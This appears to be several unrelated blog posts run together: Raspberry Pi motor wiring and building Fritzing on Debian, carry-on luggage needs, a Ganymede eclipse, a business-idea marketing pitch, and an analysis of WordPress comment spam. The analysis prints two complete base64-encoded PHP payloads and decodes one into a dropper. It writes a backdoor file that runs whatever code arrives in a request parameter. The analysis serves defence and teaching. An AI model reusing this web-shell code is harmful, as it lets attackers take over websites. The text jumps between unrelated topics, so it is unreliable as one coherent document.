Once I got it working, I realized how much I didn't relish the thought of ever doing it again -- like whenever I needed to unplug the motors from the Pi and use it for something else.

Fortunately, at some point I'd bought an Adafruit Pi Plate, sort of the RPi equivalent of Adafruit's Arduino ProtoShield. I love protoshields. I have a bunch of them, and I use them for all sorts of Arduino projects, so I'd bought the Pi Plate thinking it might come in handy some day. It's not quite like a protoshield, because it's expensive and heavy, loaded up with lots of pointless screw terminals. But you don't have to solder the screw terminals on; just solder the headers and you have a protoshield for your RPi on which you can put a mini breadboard and build your motor circuit.

I do wish, though, that Adafruit or someone made a simple, basic proto board PCB with headers for the Pi. No screw terminals, no extra parts, just the PCB and headers, to make it easy and cheap to swap between different RPi projects. The HobbyTronics Slice of Pi looks intriguing, but the GPIO pins it exposes don't seem to be the same ones exposed on the RPI's GPIO header. I'd be interested in hearing from anyone who's tried one of these.

Anyway, with the Pi Plate shield, my motor circuit looks much neater, and I can unplug it from my RPi without fear that it'll mean another half hour if I ever want to get the motors hooked up again. I did have to change some of the pin assignments yet again, because the Pi Plate doesn't expose all the GPIO pins available on the RPi header. I ended up using 25, 23, 24 for the first motor, and 17, 21, 22 for the second.

I wanted to make a circuit diagram with Fritzing, but it turns out the Fritzing I have can't import part definitions like the one for Raspberry Pi, and the current Fritzing doesn't work on Debian Wheezy. So that'll have to wait. But here's a photo of my breadboarded circuit on the Pi Plate, and a link to my motor breadboarded circuit using a cable to the GPIO.

Kevin Mark tipped me off that Fritzing is quite easy to build under Debian, if you first apt-get install qt4-qmake libqt4-dev libboost1.49-dev
I had to add one more package to Kevin's list, libqt4-sql-sqlite, or I got a lot of QSQLITE driver not loaded and other errors on the terminal, and a dialog saying "Unable to find the following 114 parts" followed by another dialog too big to fit on the screen with a list of all the missing parts.
Once those packages are installed, download the Fritzing source tarball, qmake, make, and sudo make install.

And my little car can go forward, spin around in both directions, and then reverse! Now the trick will be to find some sensors I can use with the pins remaining ...

I currently own a 20" rolling carry-on bag that has met my airline & train travel needs for years (I switched to it a year or two before airlines started charging for checked bags), and it's perfect for a week-long conference where I'm coming back or going out with a lot of stuff, or when I'm visiting my parents for close to a month at Christmas, but it seems excessive when I'm going for a weekend trip or a job interview.

I'm considering getting a smaller suitcase for those shorter trips, so I'm working out my requirements. This thread covers more or less what I have in mind, but here's some personal preference/requirement notes:

1. Must have wheels. I used to do backpack+purse for shorter trips, but I've been finding that I often pinch a nerve during travel and I'm pretty sure carrying my camera/laptop on my back is a factor.

2. Can fit my laptop and possibly SLR camera + 2-3 days worth of clothes. Thankfully my clothes are pretty small. Camera may be optional: I'm trying a downgrade to a point and shoot for short trips.

3. Preferably I'd like something that can fit into the overhead bin on the smaller regional jets, since often my flight will have one hop with those. A search says that this means the bag will have to be around 18Lx14Wx7D. Sounds like you can fit larger, but I'd rather not have to argue it out with the gate staff / flight attendant every time. I am perfectly ok with being given a checked tag and then "obliviously" carrying my bag on the plane anyhow as long as it will fit, though.

4. Butnot arguing with the gate/flight staff every time I fly would be awesome. This may mean going with something more backpack-like so I can just put it on my back when I walk on the plane, but mostly it just reinforces "small" and "looks like it holds a laptop." Briefcases should work.

5. Should have an open clothing section as opposed to a bunch of filefolder divider things that will make it harder to pack.

6. Should open fully, at least for the clothing section. Pure preference on my part.

7. I'm not too picky about laptop sleeves, although something I can easily slip a laptop out of for the TSA or in case I do have to check the bag is good. I basically never use my laptop on the plane, I just don't want to skycheck it.

8. If at all possible, not black. Something like 90% of the suitcases I see are black and I don't want to be worrying about someone grabbing mine by mistake.

9. But (and i realize this may contradict the "not black" thing) something that looks more business traveller-y would be good. I have a *lot* of trouble with TSA reps assuming I'm young or an infrequent traveler which is especially frustrating when I go somewhere with J and they immediately assume he's an expert while I get the "oh, hon, you know our machines are perfectly safe?" talk-down-to-the-little-girl spiel. (My new response: "My sister is a physicist who works in health and safety; I'd like to opt out." which is factually true but irrelevant and calculated to throw them and possibly nearby travelers out of their default headspace without getting into an argument.)




I've been finding that
(a) A disturbing number of online sites don't give pictures of the inside of the bags.
(b) A disturbing number of online sites don't give dimensions or even pictures that could help me guess the dimensions
(c) Bags are expensive (duh)
(d) There is an entire market for "women's suitcases" which I find somewhat strange. Particularly given that the "women's briefcase-bags" seem pretty much identical to the non-women's ones.



I don't have any short trips scheduled, but I'm hoping to find some bag options I like and catch a sale (luggage goes on sale quite frequently, so it's a bit ridiculous to pay full price if I've got time to spare).

I would love to hear first hand testimonials from any of you who travel with a bag that might meet my needs, though. It was a recommendation from Linuxchix that drew me to my current bag which has done me pretty well although it's starting to show its age now.

comments

A couple of months ago I wrote about watching an eclipse of Europa by Jupiter's shadow. It's a game I call "Whac-a-Moon", where a moon comes out from behind Jupiter, but stays there for only a short time then disappears into eclipse. If you aren't ready for it, it's gone.

This can only happen when Jupiter's shadow is offset from Jupiter that there's a gap between the planet and the shadow as seen from Earth. Jupiter is getting low in the west, and soon we'll lose it behind the sun, but tonight, Wednesday May 8, there's a decent Ganymede Whac-a-Moon opportunity for those of us on the US west coast.

Ganymede disappears behind Jupiter at 6:45 pm PDT, still during daylight. Some time around 9:43 Ganymede reappears from behind Jupiter, but it only stays visible for a couple of minutes before entering Jupiter's eclipse. Don't trust these times I'm giving you: set up at least five minutes early, preferably more than that. And set up somewhere with a good western horizon, because Jupiter will be very low, less than 8 degrees above the horizon.

You can simulate the event on my Javascript Jupiter. When the G goes blue, that means Ganymede is in eclipse. But the simulation won't show you the interesting part: how gradual the eclipse is, as the moon slides through the edge of Jupiter's shadow. During the Europa eclipse a few months ago, I wanted to record the time of disappearance so I could adjust my code accordingly, but I found I couldn't pin it down at all -- Europa started dimming almost as soon as it emerged from behind Jupiter, and kept dimming until I couldn't convince myself I saw it any more.

So far, I've only watched Europa as it slid into eclipse by Jupiter's shadow; I haven't whacked Ganymede. But Ganymede is so much larger that I suspect the slow dimming effect will be even more obvious. Unfortunately, I'm not optimistic about being able to see it myself; we've had cloudy skies here for the last few nights, and that combined with the low western horizon may do me in. I may have to wait until autumn, when Jupiter will next be visible in our evening skies. But I hope someone reading this gets a chance to see this month's eclipse.

Starting a new business, but stuck on finding the perfect idea? I hear you. In fact, you’re not alone.

Recently, I asked people who opted-in for more information on my upcoming “Art of Email” course what they needed most in their businesses. Although many people said “Customers!”, several people asked how they would go about finding the perfect new business idea.

Let’s talk about that. I know the phase you’re in when you’re stuck on the idea. You want to start a business. It pays better (maybe!), offers more flexible time by allowing you to set your own hours, and gets you out from under the thumb of a boss. Plus, it’d be awesome to work for yourself and get people to sign up for something you’re doing for them.

The problem is making the leap from where you are now to actually having a successful business. In this post, we’ll work together on the first few steps to get you to the point of building your new business’s foundation.

First, to have a business, you need two clearly-identified items:

• A market…
• And a validated pain point within that market. (Key word here is validated.)

Finding A Market For Your Business

Let’s address finding a market first.

A market is a subset of people who are willing to fork over money for your product. The more clearly-defined and specific your market is, the easier it’s going to be to sell your product.

Good examples of markets:
Accountants in Boise, ID (ideally with an idea that you can expand to accountants in other locations later)
People diagnosed with Celiac disease in the past 7 days
People who know Javascript programming and who want to learn Ruby programming

Notice here that I’ve stepped away from the vague “small business owners” or “moms with kids age 3-5″ types of markets. Though those are markets for large companies that sell huge amounts of products, you need a tightly-focused niche market to start your product with. (Later, as your business grows, you can expand what you offer. But for now, keep it tight.)

Now, to pair with your niche market, you need a validated pain point that people in that market are experiencing. When I say “validated”, what I mean is that you’ve talked to multiple people in that specific market and you know that it is a pain point that they are willing to pay to solve.

For instance, I was in the market of “People diagnosed with Celiac disease in the past 7 days” back in 2009. (I even wrote a blog post about it.) If you’ve ever had a diagnosis that’s life-changing, as this one is (you can never eat wheat or foods with gluten in them again–I didn’t even know what “gluten” was!), you’re in a huge world of hurt and pain. (In my case, I was literally in pain.) And you’re willing to spend money to make that pain go away.

Within the first week of being diagnosed, I’d already bought two books on Celiac disease/gluten intolerance. I’d also turned my pantry upside down, chucking a whole trash can’s worth of food with wheat in it and spending $200+ on new groceries that I had identified as gluten-free. I spent time madly doing research, trying to figure out if the soy sauce and Worcestershire sauce that I had was gluten-free, or if ingredients like “maltodextrin” had gluten in them (in the U.S., maltodextrin is made from corn and is gluten-free.)

That pain point of “first diagnosis” is when you will try anything to get help, and money suddenly becomes less relevant. That’s a perfect market to sell to!

The “Emotion Test”: How Painful is The Problem You’re Solving?

When you’re speaking with potential customers about your product (or even just speaking with them frankly, trying to understand their problems), and they start to get emotional, that’s when you know you may have a good new business idea on hand. Can you help solve that pain point that’s making them emotional? The one that may have them literally in pain (as it was in my case?) That’s your market.

But what if you don’t have any idea what to sell? Then I recommend starting with a market and talking to them–getting them to speak frankly about their problems. Let’s face it–everyone loves to talk about their problems! Some of those problems you can solve, and some of them you can’t, but at least you’ll know what’s bugging people out there.

For instance, my personal trainer here in Austin, Jake, loves to complain about the billing software he uses. He hates it and wants to light it on fire! And whenever he posts about it on Facebook, other personal trainer friends of his chime in, agreeing. There’s a lucrative market out there for someone who wants to address that problem and build better billing and scheduling software for personal trainers.

The lady who owns the salon I go to has a problem where she can’t accurately measure the amount of hair color her stylists use on clients. Clients with longer hair need more hair color, so she can guess, but guesses aren’t always accurate. She needs a system where she can measure the amount of hair color used every time, accurately, and bill her stylists and their clients appropriately.

And her husband owns a BBQ restaurant where they hire someone to man the smoker overnight and make sure the temperature of their brisket remains constant so they can serve food early in the morning after smoking it for 12 hours–except that someone fell asleep one night manning the brisket, and there weren’t any alarms that went off. The brisket overcooked and not only did they have nothing to serve the next day, making them look bad in front of customers, but they lost hundreds of dollars in brisket that they had bought to serve that day. They need a temperature logging device–and now my fiance is working on a side project to build one for them and other BBQ shop owners.

In each of these examples, we see a business owner who is desperately in need of a product that will help them either save money and/or make more money. And these are just a few ideas. Make room for some local small business owners in your friend circle, or go to some local meetups, and put your ear to the ground. You’ll quickly hear what problems they have. From there, it’s up to you to decide if solving those problems is a market you’d be interested in pursuing.

The good news is that as soon as you do have a prototype, since you’ve validated the market up front, it won’t be an uphill battle to get your first few customers. You can just call them up or email them–they’ll be waiting for you with credit cards in hand!

–

In my upcoming “Art of Email” course, I’m going to show you how you can get customers (or get feedback from potential customers) without leaving your seat. In other words, no more cold-calling, knocking on doors, or having to figure out where business owners hang out–you can drop a few emails, even to people you don’t know, and get them to open up and respond.

And if you don’t know what idea you want to pursue, I’m including a series of videos on how to choose the right business idea and validate that with real potential customers.

In short, if you want to grow your business or start a business, “Art of Email” is where you’ll want to be. Make sure to opt-in to the extra-awesome email list below (it’s a different list than my primary email list) to be the first to know when “Art of Email” launches. I’ll also be offering some special bonuses just to the people on that list.

Opt in below and I’ll send you more details in the next week:

Copyright © 2008
This feed is for personal, non-commercial use only.
The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:
ca01ca7aefbdcac4b8bbfff1994a3b42)

WARNING: This entry contains some actual malicious code. I've HTML-escaped it so that it isn't going to get executed by you viewing it, but it was clearly intended to attack Wordpress blogs, so if you're going to mess around with analyzing, do it in a browser that's not logged in to any Wordpress blog.

So I was clearing spam queues this morning, and came across a bunch of spam with this string in it:

eval(base64_decode(‘aWYoJGY9Zm9wZW4oJ3dwLWNvbnRlbnQvY2FjaGUvaWZvb2FnLnBocCcsJ3cnKSl7ZnB1dHMoJGYsJzw/cGhwIC8qTiVQYCUqL2V2YWwvKklmXCcsLSovKC8qPjZgSGUqL2Jhc2U2NF9kZWNvZGUvKkBNKTIqLygvKn46SDUqL1wnTHlwM1kyQTdjQ292YVdZdktuY2hibHNxTHlndktsNXpXeUZVY25CUktpOXBjM05sZEM4cVVFZzBPWHhBS2k4b0x5cDRZR3BXS1U0cUx5UmZVa1ZSVlVWVFZDOHFjaUI0S2k5Ykx5b29mbEZ4S2k4bll5Y3ZLakUvUUdWMFd5b3ZMaThcJy8qT3pNNTIwKi8uLyo5SissKi9cJ3FQU3dwS2k4bmVpY3ZLblZVUVRrektpOHVMeXBEZTBjNlFEUmNLaThuYkNjdktqaDBJRzhxTHk0dkttMTVUVDA4UkdBcUx5ZDZKeThxZUdkbk1YWTJNU292TGk4cVZuQkpaelFxTHlkNUp5OHFaWHhxZVVFcUx5NHZLaXgyS0NvdkoyXCcvKnlBdCYqLy4vKkA1RHcmXU4qL1wnd25MeXBHTFZGdlREUXFMMTB2S21KaGEwMHBLaTh2S2x3N2MyNHFMeWt2S2s1M1Mwa25YeW92THlwUFgyc3FMeWt2S2toQVlVczBWQ292WlhaaGJDOHFNazU4TWpBK0tpOG9MeXBWYzBodFdWMWxXaW92YzNSeWFYQnpiR0Z6YUdWekxcJy8qWWFiayovLi8qT35xcyovXCd5bzhTR2N6S2k4b0x5cFZRVXRoWmlvdkpGOVNSVkZWUlZOVUx5cFdMa3RVSUhzcUwxc3ZLa3N0TG1NcUx5ZGpKeThxU0c5b0tpOHVMeXBZVGp0SEtpOG5laWN2S2pzbU15Z3lNV1FtWFNvdkxpOHFPMUJQZFNvdkoyd25MeXBaV1ZBelwnLyp7WUp9MSovLi8qdisoLTtrKi9cJ2VuVXFMeTR2S2xWc2FWVXRLaThuZW5sc0p5OHFSbFJaWERRcUwxMHZLazQvVW1JK0syWXFMeThxU3l0TFF5b3ZLUzhxYkVCcUtpOHZLbUpZUENvdktTOHFPbG8yVlVVb1NrSTRLaTh2S2tKWFp6dEFTeW92T3k4cVJUc3JkaWRKS2k4PVwnLyooa0NwQFk+Ki8pLypgYmMqLy8qSHZeISovKS8qV21GKi8vKlBfV2VgYD57Ki87LyotfGxURTEqLz8+Jyk7ZmNsb3NlKCRmKTt9′));

Or this clearly related one (note that the top of the string is the same):

aWYoJGY9Zm9wZW4oJ3dwLWNvbnRlbnQvY2FjaGUvaWZvb2FnLnBocCcsJ3cnKSl7ZnB1dHMoJGYsJzw/cGhwIC8qcGshV1UqL2V2YWwvKnpDRnI4ejQqLygvKi1mJWYmZyovYmFzZTY0X2RlY29kZS8qY2hIIG0qLygvKnZXXnEqL1wnTHlvL05tcHlLaTlwWmk4cU9ENUpUM2NxTHlndktsdHZLU292YVhOelpYUXZLa2M2WTNRcUx5Z3ZLaUZQWERrcUx5UmZVa1ZSVlVWVFZDOHFjU3R5S1RGNklDb3ZXeThxV0RkblNDb3ZcJy8qd0VEJSovLi8qWnA2OnIqL1wnSjJNbkx5b2hSU0VxTHk0dktrZEVSU3RrS2k4bmVpY3ZLa2NyUUVZd09Db3ZMaThxUFU5RUxqQTZUaW92SjJ3bkx5cDhkRE14UkNvdkxpOHFLVFIwT2xoc2MyZ3FMeWQ2ZVd3bkx5cFRcJy8qQ01MRzEqLy4vKmlUeVUwflAqL1wnVFZBdFFTb3ZYUzhxSnpaUFR5MHFMeThxVFZOYlpDb3ZLUzhxWEU1TU1Tb3ZMeXB1SjFzcUx5a3ZLaVZ5Y0N4aEtpOWxkbUZzTHlwTkxseHBLaThvTHlwdFVtNDFJSGxTS2k5emRISnBcJy8qXXgyZCovLi8qIG5SKi9cJ2NITnNZWE5vWlhNdktrbytiRGhrS2k4b0x5bzFOa3hZVTB0Z1RTb3ZKRjlTUlZGVlJWTlVMeXBPWGt0YVF6d3FMMXN2S201TWNrWXpjeUFxTHlkakp5OHFiQ3RLY2lvdkxpOHFUUzFuXCcvKmhccGhpKi8uLypjVz4qL1wnS2k4bmVpY3ZLaUZGTmlvdkxpOHFVeWRLUVNvdkoyd25MeXB1S1ZWQUxpb3ZMaThxYkZoV1BEOW9aU292SjNvbkx5cFZJRk1xTHk0dktqRkFlME1zS2k4bmVTY3ZLajk4V3lvdkxpOHFcJy8qPE9rNXBmKi8uLyo0VlhFKi9cJ1VtODJVeW92SjJ3bkx5cFZURm9xTDEwdktpWjNOQ292THlvL0xXWjVLaThwTHlvL01URXFMeThxSjN4ZlFTb3ZLUzhxT2psSlRGSXFMeThxYjBNeFFTY3JKU292T3k4cWVWbzVUeW92XCcvKiAzXCcqLykvKlpsWyUqLy8qLVRPJUdiNiovKS8qUyw3bjRTLCovLypCQ1sqLzsvKkxacHM8blNaKi8/PicpO2ZjbG9zZSgkZik7fQ==

As you can tell from the first sample, it's base64 encoded... something. b64 is pretty commonly used by attackers to obfuscate their code, so in case the spammy username and comment that went with the code wasn't enough to tell me that something bad was intended, the b64 encoding itself would have been a clue. If I didn't have the pretty huge hint of the base64_decode line, I might have been able to figure it out from the format and the fact that I know that b64 uses = as a padding (visible at the end of the second string).

Being a curious sort of person, I decoded the first string. In my case, I just opened up Python, and did this:

>>> import base64
>>> base64.b64decode(badstring1)
"if($f=fopen('wp-content/cache/ifooag.php','w'))
{fputs($f,'<?php /*N%P`%*/eval/*If\\',-*/(/*>6`He*/base64_decode/*@M)2*/(/*~:H5*/
\\'Lyp3Y2A7cCovaWYvKnchblsqLygvKl5zWyFUcnBRKi9pc
3NldC8qUEg0OXxAKi8oLyp4YGpWKU4qLyRfUkVRVUVTVC8qc
iB4Ki9bLyooflFxKi8nYycvKjE/QGV0WyovLi8\\'/*OzM52
0*/./*9J+,*/\\'qPSwpKi8neicvKnVUQTkzKi8uLypDe0c6
QDRcKi8nbCcvKjh0IG8qLy4vKm15TT08RGAqLyd6Jy8qeGdn
MXY2MSovLi8qVnBJZzQqLyd5Jy8qZXxqeUEqLy4vKix2KCov
J2\\'/*yAt&*/./*@5Dw&]N*/\\'wnLypGLVFvTD
QqL10vKmJha00pKi8vKlw7c24qLykvKk53S0knXyovLypPX2
sqLykvKkhAYUs0VCovZXZhbC8qMk58MjA+Ki8oLypVc0htWV
1lWiovc3RyaXBzbGFzaGVzL\\'/*Yabk*/./*O~qs*/\\'yo
8SGczKi8oLypVQUthZiovJF9SRVFVRVNULypWLktUIHsqL1s
vKkstLmMqLydjJy8qSG9oKi8uLypYTjtHKi8neicvKjsmMyg
yMWQmXSovLi8qO1BPdSovJ2wnLypZWVAz\\'/*{YJ}1*/./*v+(-;k*/\\'enUqLy4vKlVsaVUtKi8nenlsJy8qRlRZXDQqL10vK
k4/UmI+K2YqLy8qSytLQyovKS8qbEBqKi8vKmJYPCovKS8qO
lo2VUUoSkI4Ki8vKkJXZztASyovOy8qRTsrdidJKi8=\\'/*(kCp@Y>*/)/*`bc*//*Hv^!*/)/*WmF*//*P_We``>
{*/;/*-|lTE1*/?>');fclose($f);}"


(Well, okay, I actually ran cgi.escape(base64.b64decode(badstring1)) to get the version you're seeing in the blog post since I wanted to make sure none of that was executed, but that's not relevant to the code analysis, just useful if you're talking about code on the internet)

So that still looks pretty obfuscated, and even more full of base64 (yo, I heard you like base64 so I put some base64 in your base64). But we've learned a new thing: the code is trying to open up a file in the wordpress cache called ifooag.php, under wp-content which is a directory wordpress needs to have write access to. I did a quick web search, and found a bunch of spam, so my bet is that they're opening a new file rather than modifying an existing one. And we can tell that they're trying to put some php into that file because of the <?php and ?> which are character sequences that tell the server to run some php code.

But that code? Still looks pretty much like gobbledegook.

If you know a bit about php, you'll know that it accepts c-style comments delineated by /* and */, so we can remove those from the php code to get something a bit easier to parse:

eval(base64_decode(\\'Lyp3Y2A7cCovaWYvKnchblsqLygvKl5zWyFUcnBRKi9pc3NldC8qUEg0OXxAKi8oLyp4YGpWKU4qLyRfUkVRVUVTVC8qciB4Ki9bLyooflFxKi8nYycvKjE/QGV0WyovLi8\\'.\\'qPSwpKi8neicvKnVUQTkzKi8uLypDe0c6QDRcKi8nbCcvKjh0IG8qLy4vKm15TT08RGAqLyd6Jy8qeGdnMXY2MSovLi8qVnBJZzQqLyd5Jy8qZXxqeUEqLy4vKix2KCovJ2\\'.\\'wnLypGLVFvTDQqL10vKmJha00pKi8vKlw7c24qLykvKk53S0knXyovLypPX2sqLykvKkhAYUs0VCovZXZhbC8qMk58MjA+Ki8oLypVc0htWV1lWiovc3RyaXBzbGFzaGVzL\\'.\\'yo8SGczKi8oLypVQUthZiovJF9SRVFVRVNULypWLktUIHsqL1svKkstLmMqLydjJy8qSG9oKi8uLypYTjtHKi8neicvKjsmMygyMWQmXSovLi8qO1BPdSovJ2wnLypZWVAz\\'.\\'enUqLy4vKlVsaVUtKi8nenlsJy8qRlRZXDQqL10vKk4/UmI+K2YqLy8qSytLQyovKS8qbEBqKi8vKmJYPCovKS8qOlo2VUUoSkI4Ki8vKkJXZztASyovOy8qRTsrdidJKi8=\\'));

Feel like we're going in circles? Yup, that's another base64 encoded string. So let's take out the quotes and the concatenations to see what that is:


Lyp3Y2A7cCovaWYvKnchblsqLygvKl5zWyFUcnBRKi9pc3NldC8qUEg0OXxAKi8oLyp4YGpWKU4qLyRfUkVRVUVTVC8qciB4Ki9bLyooflFxKi8nYycvKjE/QGV0WyovLi8qPSwpKi8neicvKnVUQTkzKi8uLypDe0c6QDRcKi8nbCcvKjh0IG8qLy4vKm15TT08RGAqLyd6Jy8qeGdnMXY2MSovLi8qVnBJZzQqLyd5Jy8qZXxqeUEqLy4vKix2KCovJ2wnLypGLVFvTDQqL10vKmJha00pKi8vKlw7c24qLykvKk53S0knXyovLypPX2sqLykvKkhAYUs0VCovZXZhbC8qMk58MjA+Ki8oLypVc0htWV1lWiovc3RyaXBzbGFzaGVzLyo8SGczKi8oLypVQUthZiovJF9SRVFVRVNULypWLktUIHsqL1svKkstLmMqLydjJy8qSG9oKi8uLypYTjtHKi8neicvKjsmMygyMWQmXSovLi8qO1BPdSovJ2wnLypZWVAzenUqLy4vKlVsaVUtKi8nenlsJy8qRlRZXDQqL10vKk4/UmI+K2YqLy8qSytLQyovKS8qbEBqKi8vKmJYPCovKS8qOlo2VUUoSkI4Ki8vKkJXZztASyovOy8qRTsrdidJKi8=

You might think we're getting close now, but here's what you get out of decoding that:

>>> base64.b64decode(badstring1a)
"/*wc`;p*/if/*w!n[*/(/*^s[!TrpQ*/isset/*PH49|@*/(/*x`jV)N*/$_REQUEST/*r x*/[/*(~Qq*/'c'/*1?@et[*/./*=,)*/'z'/*uTA93*/./*C{G:@4\\*/'l'/*8t o*/./*myM=/*e|jyA*/./*,v(*/'l'/*F-QoL4*/]/*bakM)*//*\\;sn*/)/*NwKI'_*//*O_k*/)/*H@aK4T*/eval/*2N|20>*/(/*UsHmY]eZ*/stripslashes/*g3*/(/*UAKaf*/$_REQUEST/*V.KT {*/[/*K-.c*/'c'/*Hoh*/./*XN;G*/'z'/*;&3(21d&]*/./*;POu*/'l'/*YYP3zu*/./*UliU-*/'zyl'/*FTY\\4*/]/*N?Rb>+f*//*K+KC*/)/*l@j*//*bX<*/)/*:Z6UE(JB8*//*BWg;@K*/;/*E;+v'I*/"

Yup, definitely going in circles. But at least we know what to do: get rid of the comments again.


Incidentally, I'm just using a simple regular expression to do this: s/\/\*[^*]*\*\///g.  That's not robust against all possible nestings or whatnot, but it's good enough for simple analysis. I actually execute it in vim as :%s/\/\*[^*]*\*\///gc and then check each piece as I'm removing it.


Here's what it looks like without the comments:

if(isset($_REQUEST['c'.'z'.'l'.'z'.'y'.'l']))eval(stripslashes($_REQUEST['c'.'z'.'l'.'zyl']));


So let's stick together those concatenated strings again:

if(isset($_REQUEST['czlzyl']))eval(stripslashes($_REQUEST['czlzyl']));

Okay, so now it's added some piece into some sort of wordpress file that is basically just waiting for some outside entity to provide code which will then be executed.  That's actually pretty interesting: it's not fully executing the malicious payload now; it's waiting for an outside request.  Is this to foil scanners that are wise to the type of things spammers add to blogs, or is this in preparation for a big attack that could be launched all at once once the machines are prepared?

It's going to go to be a request that starts like this

http://EXAMPLE.COM/wp-content/cache/ifooag.php?czlzyl=

Unfortunately, I don't have access to the logs for the particular site I saw this on, so my analysis stops here and I can't tell you exactly what it was going to try to execute, but I think it's pretty safe to say that it wouldn't have been good. I can tell you that there is no such file on the server in question and, indeed, the code doesn't seem to have been executed since it got caught in the spam queue and discarded by me.

But if you've ever had a site compromised and wondered how it might have been done, now you know a whole lot more about the way it could have happened. All I can really suggest is that spam blocking is important (these comments were caught by akismet) and that if you can turn off javascript while you're moderating comments, that might be the safest possible thing to do even though it makes using wordpress a little more kludgy and annoying. Thankfully it doesn't render it unusable!

Meanwhile, want to try your own hand at analyzing code? I only went through the full decoding for the first of the two strings I gave at the top of this post, but I imagine the second one is very similar to the first, so I leave it as an exercise to the reader. Happy hacking!